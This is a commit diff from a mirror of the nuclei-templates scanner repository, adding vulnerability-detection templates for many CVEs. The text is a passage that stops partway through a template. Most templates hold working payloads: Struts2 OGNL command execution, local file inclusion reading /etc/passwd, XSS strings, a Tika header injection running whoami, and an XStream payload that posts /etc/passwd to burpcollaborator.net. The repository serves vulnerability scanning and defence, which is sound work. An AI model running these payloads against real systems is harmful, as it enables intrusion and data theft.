daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge branch 'master' into CVE-2018-18778

patch-1
PD-Team 2021-03-11 20:37:53 +05:30 committed by GitHub
parent ea0efacb13 b32604fe6d
commit d8edcb99a8
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
178 changed files with 3425 additions and 157 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

4
.github/ISSUE_TEMPLATE/false-positive.md vendored
View File

@ -1,8 +1,8 @@
---
name: False Positive
about: 'Create an issue if you found false positive results. '
title: "[false-positive] "
labels: ''
title: "[false-positive] template-name "
labels: 'false-positive'
assignees: ''
---

7
.github/ISSUE_TEMPLATE/submit-template.md vendored
View File

@ -1,14 +1,15 @@
---
name: Submit Template
about: Submit nuclei template using issue
title: "[nuclei-template] "
labels: ''
title: "[nuclei-template] template-name"
labels: 'nuclei-template'
assignees: ''
---
**Template Details**
```
```yaml
nuclei template goes here
```

2
.github/workflows/update-readme.yml vendored
View File

@ -11,7 +11,7 @@ on:
jobs:
build:
runs-on: ubuntu-latest
if: github.repository == 'projectdiscovery/nuclei-templates'
if: github.repository == 'projectdiscovery/nuclei-templates' && github.ref == 'refs/heads/master'
steps:
- name: Install tree
run: sudo apt-get install tree -y

2
.nuclei-ignore
View File

@ -19,6 +19,6 @@ fuzzing/
# Wordlist directory contains payload to be used with templates.
helpers/
miscellaneous/
headless/
# Workflows are excluded from default run to avoid duplicate scans.
workflows/

8
README.md
View File

@ -37,13 +37,13 @@ An overview of the nuclei template directory including number of templates assoc
| Templates | Counts | Templates | Counts | Templates | Counts |
| -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ |
| cves | 207 | vulnerabilities | 98 | exposed-panels | 74 |
| exposures | 55 | technologies | 46 | misconfiguration | 48 |
| workflows | 21 | miscellaneous | 13 | default-logins | 11 |
| cves | 235 | vulnerabilities | 105 | exposed-panels | 104 |
| exposures | 63 | technologies | 50 | misconfiguration | 54 |
| workflows | 23 | miscellaneous | 16 | default-logins | 19 |
| exposed-tokens | 9 | dns | 6 | fuzzing | 4 |
| helpers | 2 | takeovers | 1 | - | - |
**62 directories, 604 files**.
**75 directories, 714 files**.
</td>
</tr>

29
cves/2007/CVE-2007-4556.yaml Normal file
View File

@ -0,0 +1,29 @@
id: CVE-2007-4556
info:
name: Apache Struts2 S2-001 RCE
author: pikpikcu
severity: critical
reference: https://www.guildhab.top/?p=2326
tags: cve,cve2007,apache,rce,struts
requests:
- method: POST
path:
- "{{BaseURL}}/login.action"
headers:
Content-Type: application/x-www-form-urlencoded
body: |
username=test&password=%25%7B%23a%3D%28new+java.lang.ProcessBuilder%28new+java.lang.String%5B%5D%7B%22cat%22%2C%22%2Fetc%2Fpasswd%22%7D%29%29.redirectErrorStream%28true%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew+java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew+java.io.BufferedReader%28%23c%29%2C%23e%3Dnew+char%5B50000%5D%2C%23d.read%28%23e%29%2C%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C%23f.getWriter%28%29.println%28new+java.lang.String%28%23e%29%29%2C%23f.getWriter%28%29.flush%28%29%2C%23f.getWriter%28%29.close%28%29%7D
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
part: body
- type: status
status:
- 200

23
cves/2008/CVE-2008-2650.yaml Normal file
View File

@ -0,0 +1,23 @@
id: CVE-2008-2650
info:
name: CMSimple 3.1 - Local File Inclusion
author: pussycat0x
severity: high
reference: https://www.exploit-db.com/exploits/5700
tags: cve,cve2008,lfi
requests:
- raw:
- |
GET /index.php?sl=../../../../../../../etc/passwd%00 HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: regex
regex:
- "root:[x*]:0:0:"
part: body

27
cves/2010/CVE-2010-2861.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-2861
info:
name: Adobe ColdFusion 8.0/8.0.1/9.0/9.0.1 LFI
author: pikpikcu
severity: high
reference: https://github.com/vulhub/vulhub/tree/master/coldfusion/CVE-2010-2861
tags: cve,cve2010,coldfusion,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/password.properties%00en"
matchers-condition: and
matchers:
- type: word
words:
- "rdspassword="
- "encrypted="
part: body
condition: and
- type: status
status:
- 200

24
cves/2012/CVE-2012-0392.yaml Normal file
View File

@ -0,0 +1,24 @@
id: CVE-2012-0392
info:
name: Apache Struts2 S2-008 RCE
author: pikpikcu
severity: critical
reference: https://blog.csdn.net/weixin_43416469/article/details/113850545
tags: cve, cve2012,apache,rce,struts
requests:
- method: GET
path:
- "{{BaseURL}}/devmode.action?debug=command&expression=(%23_memberAccess[%22allowStaticMethodAccess%22]%3Dtrue%2C%23foo%3Dnew%20java.lang.Boolean(%22false%22)%20%2C%23context[%22xwork.MethodAccessor.denyMethodExecution%22]%3D%23foo%2C@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%27cat%20/etc/passwd%27).getInputStream()))"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200

28
cves/2013/CVE-2013-1965.yaml Normal file
View File

@ -0,0 +1,28 @@
id: CVE-2013-1965
info:
name: Apache Struts2 S2-012 RCE
author: pikpikcu
severity: critical
reference: https://nvd.nist.gov/vuln/detail/CVE-2013-1965
tags: cve,cve2013,apache,rce,struts
requests:
- method: POST
path:
- "{{BaseURL}}/user.action"
headers:
Content-Type: application/x-www-form-urlencoded
body: |
name=%25%7B%23a%3D%28new+java.lang.ProcessBuilder%28new+java.lang.String%5B%5D%7B%22cat%22%2C+%22%2Fetc%2Fpasswd%22%7D%29%29.redirectErrorStream%28true%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew+java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew+java.io.BufferedReader%28%23c%29%2C%23e%3Dnew+char%5B50000%5D%2C%23d.read%28%23e%29%2C%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C%23f.getWriter%28%29.println%28new+java.lang.String%28%23e%29%29%2C%23f.getWriter%28%29.flush%28%29%2C%23f.getWriter%28%29.close%28%29%7D
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200

2
cves/2013/CVE-2013-2251.yaml
View File

@ -5,7 +5,7 @@ info:
author: exploitation & @dwisiswant0
severity: critical
description: In Struts 2 before 2.3.15.1 the information following "action:", "redirect:" or "redirectAction:" is not properly sanitized. Since said information will be evaluated as OGNL expression against the value stack, this introduces the possibility to inject server side code.
tags: cve,cve2013,rce
tags: cve,cve2013,rce,struts,apache
requests:
- payloads:

26
cves/2015/CVE-2015-2080.yaml Normal file
View File

@ -0,0 +1,26 @@
id: CVE-2015-2080
info:
name: Eclipse Jetty Remote Leakage
author: pikpikcu
severity: medium
reference: https://nvd.nist.gov/vuln/detail/CVE-2015-2080
description: |
The exception handling code in Eclipse Jetty before 9.2.9.v20150224 allows remote attackers to obtain sensitive information from process memory via illegal characters in an HTTP header, aka JetLeak
requests:
- method: POST
path:
- "{{BaseURL}}/"
headers:
Referer: "\x00"
matchers-condition: and
matchers:
- type: status
status:
- 400
- type: word
words:
- "Illegal character 0x0 in state"
part: body

4
cves/2016/CVE-2016-3081.yaml
View File

@ -1,11 +1,11 @@
id: CVE-2016-3081
info:
name: S2-032 Struts RCE
name: Apache S2-032 Struts RCE
author: dhiyaneshDK
severity: high
reference: https://cwiki.apache.org/confluence/display/WW/S2-032
tags: cve,cve2016,struts,rce
tags: cve,cve2016,struts,rce,apache
requests:
- raw:

4
cves/2016/CVE-2016-7552.yaml
View File

@ -23,5 +23,5 @@ requests:
- 200
- type: word
words:
- "Backtrace"
part: header
- "Memory map"
part: body

24
cves/2017/CVE-2017-12611.yaml Normal file
View File

@ -0,0 +1,24 @@
id: CVE-2017-12611
info:
name: Apache Struts2 S2-053 RCE
author: pikpikcu
severity: critical
reference: https://nvd.nist.gov/vuln/detail/CVE-2017-12611
tags: cve,cve2017,apache,rce,struts
requests:
- method: POST
path:
- "{{BaseURL}}/?name=%25%7B%28%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS%29.%28%23_memberAccess%3F%28%23_memberAccess%3D%23dm%29%3A%28%28%23container%3D%23context%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ognlUtil%3D%23container.getInstance%28%40com.opensymphony.xwork2.ognl.OgnlUtil%40class%29%29.%28%23ognlUtil.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ognlUtil.getExcludedClasses%28%29.clear%28%29%29.%28%23context.setMemberAccess%28%23dm%29%29%29%29.%28%23cmd%3D%27cat%20/etc/passwd%27%29.%28%23iswin%3D%28%40java.lang.System%40getProperty%28%27os.name%27%29.toLowerCase%28%29.contains%28%27win%27%29%29%29.%28%23cmds%3D%28%23iswin%3F%7B%27cmd.exe%27%2C%27/c%27%2C%23cmd%7D%3A%7B%27/bin/bash%27%2C%27-c%27%2C%23cmd%7D%29%29.%28%23p%3Dnew%20java.lang.ProcessBuilder%28%23cmds%29%29.%28%23p.redirectErrorStream%28true%29%29.%28%23process%3D%23p.start%28%29%29.%28%40org.apache.commons.io.IOUtils%40toString%28%23process.getInputStream%28%29%29%29%7D"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200

2
cves/2017/CVE-2017-14537.yaml
View File

@ -6,7 +6,7 @@ info:
severity: medium
tags: cve,cve2017,trixbox,traversal
# Refrence:-https://nvd.nist.gov/vuln/detail/CVE-2017-14537
# reference:-https://nvd.nist.gov/vuln/detail/CVE-2017-14537
# https://secur1tyadvisory.wordpress.com/2018/02/13/trixbox-multiple-path-traversal-vulnerabilities-cve-2017-14537/
# Product vendor:-https://sourceforge.net/projects/asteriskathome/

26
cves/2017/CVE-2017-16877.yaml Normal file
View File

@ -0,0 +1,26 @@
id: CVE-2017-16877
info:
name: Nextjs v2.4.1 LFI
author: pikpikcu
severity: high
reference: https://medium.com/@theRaz0r/arbitrary-file-reading-in-next-js-2-4-1-34104c4e75e9
tags: cve,cve2017,nextjs,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/_next/../../../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
part: body
condition: and
- type: status
status:
- 200

6
cves/2017/CVE-2017-5638.yaml
View File

@ -1,10 +1,10 @@
id: CVE-2017-5638
info:
author: "Random Robbie"
name: "Struts2 RCE "
author: Random Robbie
name: Apache Struts2 RCE
severity: critical
description: Struts is vulnerable to remote command injection attacks through incorrectly parsing an attackers invalid Content-Type HTTP header. The Struts vulnerability allows these commands to be executed under the privileges of the Web server.
tags: cve,cve2017,struts,rce
tags: cve,cve2017,struts,rce,apache
# This template supports the detection part only.
# Do not test any website without permission

33
cves/2017/CVE-2017-9791.yaml Normal file
View File

@ -0,0 +1,33 @@
id: CVE-2017-9791
info:
name: Apache Struts2 S2-053 RCE
author: pikpikcu
severity: critical
reference: https://nvd.nist.gov/vuln/detail/CVE-2017-9791
tags: cve, cve2017,apache,rce
requests:
- method: POST
path:
- "{{BaseURL}}/integration/saveGangster.action"
headers:
Content-Type: application/x-www-form-urlencoded
body: |
name=%25%7b%28%23%64%6d%3d%40%6f%67%6e%6c%2e%4f%67%6e%6c%43%6f%6e%74%65%78%74%40%44%45%46%41%55%4c%54%5f%4d%45%4d%42%45%52%5f%41%43%43%45%53%53%29%2e%28%23%5f%6d%65%6d%62%65%72%41%63%63%65%73%73%3f%28%23%5f%6d%65%6d%62%65%72%41%63%63%65%73%73%3d%23%64%6d%29%3a%28%28%23%63%6f%6e%74%61%69%6e%65%72%3d%23%63%6f%6e%74%65%78%74%5b%27%63%6f%6d%2e%6f%70%65%6e%73%79%6d%70%68%6f%6e%79%2e%78%77%6f%72%6b%32%2e%41%63%74%69%6f%6e%43%6f%6e%74%65%78%74%2e%63%6f%6e%74%61%69%6e%65%72%27%5d%29%2e%28%23%6f%67%6e%6c%55%74%69%6c%3d%23%63%6f%6e%74%61%69%6e%65%72%2e%67%65%74%49%6e%73%74%61%6e%63%65%28%40%63%6f%6d%2e%6f%70%65%6e%73%79%6d%70%68%6f%6e%79%2e%78%77%6f%72%6b%32%2e%6f%67%6e%6c%2e%4f%67%6e%6c%55%74%69%6c%40%63%6c%61%73%73%29%29%2e%28%23%6f%67%6e%6c%55%74%69%6c%2e%67%65%74%45%78%63%6c%75%64%65%64%50%61%63%6b%61%67%65%4e%61%6d%65%73%28%29%2e%63%6c%65%61%72%28%29%29%2e%28%23%6f%67%6e%6c%55%74%69%6c%2e%67%65%74%45%78%63%6c%75%64%65%64%43%6c%61%73%73%65%73%28%29%2e%63%6c%65%61%72%28%29%29%2e%28%23%63%6f%6e%74%65%78%74%2e%73%65%74%4d%65%6d%62%65%72%41%63%63%65%73%73%28%23%64%6d%29%29%29%29%2e%28%23%71%3d%40%6f%72%67%2e%61%70%61%63%68%65%2e%63%6f%6d%6d%6f%6e%73%2e%69%6f%2e%49%4f%55%74%69%6c%73%40%74%6f%53%74%72%69%6e%67%28%40%6a%61%76%61%2e%6c%61%6e%67%2e%52%75%6e%74%69%6d%65%40%67%65%74%52%75%6e%74%69%6d%65%28%29%2e%65%78%65%63%28%27%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%27%29%2e%67%65%74%49%6e%70%75%74%53%74%72%65%61%6d%28%29%29%29%2e%28%23%71%29%7d&age=10&__checkbox_bustedBefore=true&description=
matchers-condition: and
matchers:
- type: word
words:
- "Content-Type: text/html"
part: header
- type: regex
regex:
- "root:[x*]:0:0"
condition: and
- type: status
status:
- 200

87
cves/2017/CVE-2017-9805.yaml Normal file
View File

@ -0,0 +1,87 @@
id: CVE-2017-9805
info:
name: Apache Struts2 S2-052 RCE
author: pikpikcu
severity: critical
reference: https://nvd.nist.gov/vuln/detail/CVE-2017-9805
tags: cve,cve2017,apache,rce,struts
requests:
- method: POST
path:
- "{{BaseURL}}/struts2-rest-showcase/orders/3"
- "{{BaseURL}}/orders/3"
headers:
Content-Type: application/xml
body: |
<map>
<entry>
<jdk.nashorn.internal.objects.NativeString>
<flags>0</flags>
<value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data">
<dataHandler>
<dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource">
<is class="javax.crypto.CipherInputStream">
<cipher class="javax.crypto.NullCipher">
<initialized>false</initialized>
<opmode>0</opmode>
<serviceIterator class="javax.imageio.spi.FilterIterator">
<iter class="javax.imageio.spi.FilterIterator">
<iter class="java.util.Collections$EmptyIterator"/>
<next class="java.lang.ProcessBuilder">
<command>
<string>wget</string>
<string>--post-file</string>
<string>/etc/passwd</string>
<string>burpcollaborator.net</string>
</command>
<redirectErrorStream>false</redirectErrorStream>
</next>
</iter>
<filter class="javax.imageio.ImageIO$ContainsFilter">
<method>
<class>java.lang.ProcessBuilder</class>
<name>start</name>
<parameter-types/>
</method>
<name>asdasd</name>
</filter>
<next class="string">asdasd</next>
</serviceIterator>
<lock/>
</cipher>
<input class="java.lang.ProcessBuilder$NullInputStream"/>
<ibuffer></ibuffer>
<done>false</done>
<ostart>0</ostart>
<ofinish>0</ofinish>
<closed>false</closed>
</is>
<consumed>false</consumed>
</dataSource>
<transferFlavors/>
</dataHandler>
<dataLen>0</dataLen>
</value>
</jdk.nashorn.internal.objects.NativeString>
<jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/>
</entry>
<entry>
<jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
<jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
</entry>
</map>
matchers-condition: and
matchers:
- type: word
words:
- "Debugging information"
- "com.thoughtworks.xstream.converters.collections.MapConverter"
condition: and
- type: status
status:
- 500

24
cves/2018/CVE-2018-11776.yaml Normal file
View File

@ -0,0 +1,24 @@
id: CVE-2018-11776
info:
name: Apache Struts2 S2-057 RCE
author: pikpikcu
severity: critical
reference: https://github.com/jas502n/St2-057
tags: cve,cve2018,apache,rce,struts2
requests:
- method: GET
path:
- "{{BaseURL}}/%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27cat%20/etc/passwd%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D/actionChain1.action"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200

40
cves/2018/CVE-2018-1335.yaml Normal file
View File

@ -0,0 +1,40 @@
id: CVE-2018-1335
info:
name: Apache Tika 1.15-1.17 Header Command Injection
author: pikpikcu
severity: critical
reference: https://rhinosecuritylabs.com/application-security/exploiting-cve-2018-1335-apache-tika/
edb: https://www.exploit-db.com/exploits/47208
tags: cve,cve2018,apache,tika,rce
requests:
- method: PUT
path:
- "{{BaseURL}}/meta"
headers:
X-Tika-OCRTesseractPath: cscript
X-Tika-OCRLanguage: //E:Jscript
Expect: 100-continue
Content-type: image/jp2
Connection: close
body: "var oShell = WScript.CreateObject('WScript.Shell');var oExec = oShell.Exec(\"cmd /c whoami\");"
matchers-condition: and
matchers:
- type: word
words:
- "Content-Type: text/csv"
part: header
- type: word
words:
- "org.apache.tika.parser.DefaultParser"
- "org.apache.tika.parser.gdal.GDALParse"
part: body
condition: and
- type: status
status:
- 200

2
cves/2018/CVE-2018-16763.yaml
View File

@ -8,7 +8,7 @@ info:
# Vendor Homepage: https://www.getfuelcms.com/
# Software Link: https://github.com/daylightstudio/FUEL-CMS/releases/tag/1.4.1
# Refrence: https://www.exploit-db.com/exploits/47138
# reference: https://www.exploit-db.com/exploits/47138
requests:
- raw:

2
cves/2018/CVE-2018-19386.yaml
View File

@ -4,7 +4,7 @@ info:
name: SolarWinds Database Performance Analyzer 11.1. 457 - Cross Site Scripting
author: pikpikcu
severity: medium
refrence: https://www.cvedetails.com/cve/CVE-2018-19386/
reference: https://www.cvedetails.com/cve/CVE-2018-19386/
tags: cve,cve2018,solarwinds,xss
requests:

34
cves/2019/CVE-2019-0221.yaml Normal file
View File

@ -0,0 +1,34 @@
id: CVE-2019-0221
info:
name: Apache Tomcat XSS
author: pikpikcu
severity: low
reference: https://nvd.nist.gov/vuln/detail/CVE-2019-0221
description: |
The SSI printenv command in Apache Tomcat 9.0.0.M1 to 9.0.0.17, 8.5.0 to 8.5.39 and
7.0.0 to 7.0.93 echoes user provided data without escaping and is,
therefore, vulnerable to XSS. SSI is disabled by default.
The printenv command is intended for debugging and is unlikely to be present in a production website.
tags: cve,cve2019,apache,xss
requests:
- method: GET
path:
- "{{BaseURL}}/printenv.shtml?%3Cscript%3Ealert(%27xss%27)%3C/script%3E"
matchers-condition: and
matchers:
- type: word
words:
- "<script>alert('xss')</script>"
- type: word
words:
- "text/html"
part: header
- type: status
status:
- 200

1
cves/2019/CVE-2019-11869.yaml
View File

@ -33,6 +33,7 @@ requests:
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Upgrade-Insecure-Requests: 1
req-condition: true
matchers-condition: and
matchers:
- type: dsl

2
cves/2019/CVE-2019-12461.yaml
View File

@ -8,7 +8,7 @@ info:
# Vendor Homepage: https://webport.se/
# Software Link: https://webport.se/nedladdningar/
# Refrence: https://github.com/EmreOvunc/WebPort-v1.19.1-Reflected-XSS
# reference: https://github.com/EmreOvunc/WebPort-v1.19.1-Reflected-XSS
requests:
- method: GET

1
cves/2019/CVE-2019-17506.yaml
View File

@ -27,3 +27,4 @@ requests:
- "</password>"
- "DEVICE.ACCOUNT"
part: body
condition: and

23
cves/2019/CVE-2019-17538.yaml Normal file
View File

@ -0,0 +1,23 @@
id: CVE-2019-17538
info:
name: Jnoj Directory Traversal for file reading(LFI)
author: pussycat0x
severity: high
reference: https://github.com/shi-yang/jnoj/issues/53
tegs: cve.cve2019,jnoj,lfi
requests:
- raw:
- |
GET /jnoj/web/polygon/problem/viewfile?id=1&name=../../../../../../../etc/passwd HTTP/1.1
Content-Type: application/x-www-form-urlencoded
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: regex
regex:
- "root:[x*]:0:0:"
part: body

17
cves/2019/CVE-2019-5127.yaml
View File

@ -23,12 +23,19 @@ requests:
matchers-condition: and
matchers:
- type: regex
regex:
- "uid(.*)"
- "gid(.*)"
part: body
- type: word
words:
- "uid="
- "gid="
- "groups="
condition: and
part: body
- type: word
words:
- text/plain
part: header
- type: status
status:
- 200

4
cves/2019/CVE-2019-7219.yaml
View File

@ -9,14 +9,14 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}}/webapp/?fccc0\"><script>alert(1)</script>5f43d=1"
- '{{BaseURL}}/webapp/?fccc%27\%22%3E%3Csvg/onload=alert(xss)%3E'
matchers-condition: and
matchers:
- type: word
part: body
words:
- "\"><script>alert(1)</script>"
- "<svg/onload=alert(xss)>"
- type: word
part: header
words:

2
cves/2019/CVE-2019-7256.yaml
View File

@ -4,7 +4,7 @@ info:
name: eMerge E3 1.00-06 - Remote Code Execution
author: pikpikcu
severity: critical
refrence: https://www.exploit-db.com/exploits/47619
reference: https://www.exploit-db.com/exploits/47619
tags: cve,cve2019,emerge,rce
# Vendor Homepage: http://linear-solutions.com/nsc_family/e3-series/

11
cves/2019/CVE-2019-8451.yaml
View File

@ -7,17 +7,6 @@ info:
reference: https://www.tenable.com/blog/cve-2019-8451-proof-of-concept-available-for-server-side-request-forgery-ssrf-vulnerability-in
tags: cve,cve2019,atlassian,jira,ssrf
# On September 9, Atlassian released version 8.4.0 for Jira Core and Jira Software, which included a fix for an important
# security issue reported in August 2019.
# CVE-2019-8451 is a pre-authentication server-side request forgery (SSRF) vulnerability found in
# the /plugins/servlet/gadgets/makeRequest resource. The vulnerability exists due to “a logic bug” in the JiraWhitelist class.
# An unauthenticated attacker could exploit this vulnerability by sending a specially crafted web request to a vulnerable
# Jira server. Successful exploitation would result in unauthorized access to view and potentially modify internal
# network resources.
# https://twitter.com/benmontour/status/1177250393220239360
# https://twitter.com/ojensen5115/status/1176569607357730817
requests:
- method: GET
path:

1
cves/2020/CVE-2020-0618.yaml
View File

@ -3,6 +3,7 @@ id: CVE-2020-0618
info:
name: RCE in SQL Server Reporting Services
author: joeldeleep
description: A remote code execution vulnerability exists in Microsoft SQL Server Reporting Services when it incorrectly handles page requests, aka 'Microsoft SQL Server Reporting Services Remote Code Execution Vulnerability'.
severity: high
reference: https://www.mdsec.co.uk/2020/02/cve-2020-0618-rce-in-sql-server-reporting-services-ssrs/
tags: cve,cve2020,rce

2
cves/2020/CVE-2020-10148.yaml
View File

@ -44,6 +44,6 @@ requests:
# - "Connection String"
# - "text/plain"
# part: all
# condtion: and
# condition: and
#
# Commented matchers can be used for "SWNetPerfMon.db" file.

8
cves/2020/CVE-2020-1147.yaml
View File

@ -3,12 +3,12 @@ id: CVE-2020-1147
info:
name: RCE at SharePoint Server (.NET Framework & Visual Studio) detection
author: dwisiswant0
description: A remote code execution vulnerability exists in .NET Framework, Microsoft SharePoint, and Visual Studio when the software fails to check the source markup of XML file input, aka '.NET Framework, SharePoint Server, and Visual Studio Remote Code Execution Vulnerability'.
severity: critical
tags: cve,cve2020,sharepoint,iis,rce
# Ref:
# - https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1147
# - https://srcincite.io/blog/2020/07/20/sharepoint-and-pwn-remote-code-execution-against-sharepoint-server-abusing-dataset.html
reference:
- https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1147
- https://srcincite.io/blog/2020/07/20/sharepoint-and-pwn-remote-code-execution-against-sharepoint-server-abusing-dataset.html
requests:
- method: GET

32
cves/2020/CVE-2020-11853.yaml Normal file
View File

@ -0,0 +1,32 @@
id: CVE-2020-11853
info:
name: Micro Focus Operation Bridge Manager RCE
author: dwisiswant0
severity: high
reference: http://packetstormsecurity.com/files/161366/Micro-Focus-Operations-Bridge-Manager-Remote-Code-Execution.html
description: |
This template supports the detection part only.
UCMDB included in versions 2020.05 and below of Operations Bridge Manager are affected,
but this template can probably also be used to detect Operations Bridge Manager
(containeirized) and Application Performance Management.
Originated from Metasploit module (#14654).
tags: cve,cve2020,opm,rce
requests:
- method: GET
path:
- "{{BaseURL}}/ucmdb-api/connect"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "HttpUcmdbServiceProviderFactoryImpl"
- "ServerVersion=11.6.0"
part: body
condition: and

32
cves/2020/CVE-2020-11854.yaml Normal file
View File

@ -0,0 +1,32 @@
id: CVE-2020-11854
info:
name: Micro Focus UCMDB RCE
author: dwisiswant0
severity: critical
reference: http://packetstormsecurity.com/files/161182/Micro-Focus-UCMDB-Remote-Code-Execution.html
description: |
This template supports the detection part only.
UCMDB included in versions 2020.05 and below of Operations Bridge Manager are affected,
but this template can probably also be used to detect Operations Bridge Manager
(containeirized) and Application Performance Management.
Originated from Metasploit module (#14654).
tags: cve,cve2020,ucmdb,rce
requests:
- method: GET
path:
- "{{BaseURL}}/ucmdb-api/connect"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "HttpUcmdbServiceProviderFactoryImpl"
- "ServerVersion=11.6.0"
part: body
condition: and

4
cves/2020/CVE-2020-12116.yaml
View File

@ -6,9 +6,7 @@ info:
severity: high
description: Zoho ManageEngine OpManager Stable build before 124196 and Released build before 125125 allows an unauthenticated attacker to read arbitrary files on the server by sending a crafted request.
tags: cve,cve2020,zoho,traversal
# References:
# - https://github.com/BeetleChunks/CVE-2020-12116
reference: https://github.com/BeetleChunks/CVE-2020-12116
requests:
- raw:

30
cves/2020/CVE-2020-12256.yaml Normal file
View File

@ -0,0 +1,30 @@
id: CVE-2020-12256
info:
name: rConfig 3.9.4 XSS
author: pikpikcu
severity: medium
reference: https://nvd.nist.gov/vuln/detail/CVE-2020-12256
tags: cve,cve2020,rconfig,xss
requests:
- method: GET
path:
- '{{BaseURL}}/devicemgmt.php?deviceId=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
words:
- "<script>alert(document.cookie)</script>"
part: body
- type: status
status:
- 200
- type: word
part: header
words:
- "text/html"

30
cves/2020/CVE-2020-12259.yaml Normal file
View File

@ -0,0 +1,30 @@
id: CVE-2020-12259
info:
name: rConfig 3.9.4 XSS
author: pikpikcu
severity: medium
reference: https://nvd.nist.gov/vuln/detail/CVE-2020-12259
tags: cve,cve2020,rconfig,xss
requests:
- method: GET
path:
- '{{BaseURL}}/configDevice.php?rid=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
words:
- "<script>alert(document.cookie)</script>"
part: body
- type: status
status:
- 200
- type: word
part: header
words:
- "text/html"

30
cves/2020/CVE-2020-13483.yaml Normal file
View File

@ -0,0 +1,30 @@
id: CVE-2020-13483
info:
name: Bitrix24 through 20.0.0 allows XSS
author: pikpikcu
severity: high
reference: https://nvd.nist.gov/vuln/detail/CVE-2020-13483
tags: cve,cve2020,xss,bitrix
requests:
- method: GET
path:
- '{{BaseURL}}/bitrix/components/bitrix/mobileapp.list/ajax.php/?=&AJAX_CALL=Y&items%5BITEMS%5D%5BBOTTOM%5D%5BLEFT%5D=&items%5BITEMS%5D%5BTOGGLABLE%5D=test123&=&items%5BITEMS%5D%5BID%5D=%3Cimg+src=%22//%0d%0a)%3B//%22%22%3E%3Cdiv%3Ex%0d%0a%7D)%3Bvar+BX+=+window.BX%3Bwindow.BX+=+function(node,+bCache)%7B%7D%3BBX.ready+=+function(handler)%7B%7D%3Bfunction+__MobileAppList(test)%7Balert(document.domain)%3B%7D%3B//%3C/div%3E'
matchers-condition: and
matchers:
- type: word
words:
- "{alert(document.domain);}"
part: body
- type: word
words:
- text/html
part: header
- type: status
status:
- 200

8
cves/2020/CVE-2020-13937.yaml
View File

@ -11,7 +11,7 @@ info:
3.0.2, 3.1.0, 4.0.0-alpha has one restful api which exposed
Kylin's configuration information without any authentication,
so it is dangerous because some confidential information entries will be disclosed to everyone.
reference: ttps://nvd.nist.gov/vuln/detail/CVE-2020-13937
reference: https://nvd.nist.gov/vuln/detail/CVE-2020-13937
tags: cve,cve2020,apache
# References:
@ -29,13 +29,15 @@ requests:
- type: status
status:
- 200
- type: word
words:
- "application/json"
condition: and
part: header
- type: word
words:
- "config"
- config
- kylin.metadata.url
condition: and
part: body

30
cves/2020/CVE-2020-14413.yaml Normal file
View File

@ -0,0 +1,30 @@
id: CVE-2020-14413
info:
name: NeDi 1.9C XSS
author: pikpikcu
severity: medium
reference: https://nvd.nist.gov/vuln/detail/CVE-2020-14413
tags: cve,cve2020,nedi,xss
requests:
- method: GET
path:
- '{{BaseURL}}/Devices-Config.php?sta=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(document.domain)%3E'
matchers-condition: and
